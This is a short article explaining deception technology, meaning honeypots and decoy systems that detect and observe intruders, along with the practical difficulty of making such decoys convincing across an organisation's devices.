It’s every business owner’s worst nightmare. A criminal has managed to break into their server by exploiting a security flaw, and they’re seeing dollar signs as they prepare to exfiltrate their victim’s data to their own nefarious ends.
Except...they haven’t gotten in at all. Not really. They might think they’ve successfully broken into their target’s systems, but in actuality, they’re trapped in a digital honeypot - the business owner is tracking their every move, and attempting to narrow down their location.
“Deception technology gives defenders a rare advantage against attackers by doing something other forms of cybersecurity doesn’t,” writes Forbes contributor Dan Woods. “[They] provide early and accurate detection by laying a minefield of attractive decoy systems and content to trip up attackers. This is all done within the organization’s networks and serves as a high-fidelity warning system of attacks that have bypassed perimeter security controls.”
How a deception system works is quite simple. You simply create a series of decoys - fake credentials and information, servers and networks that don’t actually exist, devices that aren’t actually in use, et-cetera. Since these are assets that no one within your organization would ever access for legitimate purposes, the moment someone attempts to interact with them, you’ll know there’s a security threat targeting your organization - either internally or externally.
Not only does this reduce dwell time and allow attackers much less freedom to go undetected, it can also help you determine the nature of an attack. Better yet, if your deception system is configured for sandbox functionality, you can observe an attacker mucking about in your decoy system, figure out what they’re trying to do, and deploy defenses to stymie their efforts. You aren’t just stopping their attack - you’re determining what the attack is, and potentially even figuring out its origin.
Sounds pretty great, right?
Here’s the bad news. Implementation of a convincing deception system is anything but easy. Digital thieves are clever - if there’s something even a little off about the server they’re accessing, they’ll probably go elsewhere (or at the very least, attempt to track down your actual systems). For that reason, your deception must be extremely realistic and comprehensive.
More importantly, it must cover your organization’s entire threat surface. If you’ve got IoT endpoints, you’ll need deception infrastructure for them. Ditto for smartphones. Machine learning can simplify this process to an extent, but it’ll still require a human touch (and regular updates) to keep things convincing.
It’s a little disheartening, really - in the eternal war for cybersecurity, criminals always seem to have the upper hand. Clever use of deception technology upsets that balance, though. It can work wonders for your security posture, and give your business a fighting chance against all but the most sophisticated attackers.